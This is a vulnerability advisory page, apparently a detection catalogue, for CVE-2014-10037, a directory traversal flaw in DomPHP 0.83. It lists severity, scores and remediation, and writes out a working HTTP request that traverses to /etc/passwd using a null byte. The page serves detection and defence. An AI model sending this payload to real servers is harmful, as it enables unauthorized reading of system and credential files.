🔙 목록으로 돌아가기

CVE-2014-10037: DomPHP 0.83 - Directory Traversal

TitleDomPHP 0.83 - Directory Traversal
Authordaffainfo
SeverityHigh
ImpactAn attacker can read, modify, or delete sensitive files on the server, potentially leading to unauthorized access or data leakage.
RemediationUpgrade to a patched version of DomPHP or apply the necessary security patches to fix the directory traversal vulnerability.
CVSS Score7.5
EPSS Score0.72691
CVE IDCVE-2014-10037
CWE IDCWE-22
Tags cve2014 cve lfi edb domphp vuln

🔍 Vulnerability Description

A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php.

🌐 HTTP Request

GET /photoalbum/index.php?urlancien&url=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2014/CVE-2014-10037.yaml

🦈 Packet Capture: ⬇️ Download cve-2014-10037.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A